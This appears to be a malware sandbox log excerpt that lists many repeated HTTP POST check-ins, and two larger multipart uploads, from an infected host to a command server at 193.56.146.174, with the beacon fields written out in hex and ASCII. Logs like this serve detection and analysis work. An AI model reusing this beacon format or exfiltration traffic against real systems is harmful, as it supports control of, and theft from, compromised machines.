                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODMyNTM=Host: 193.56.146.174Content-Length: 83405Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODMyNTM=Host: 193.56.146.174Content-Length: 83405Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
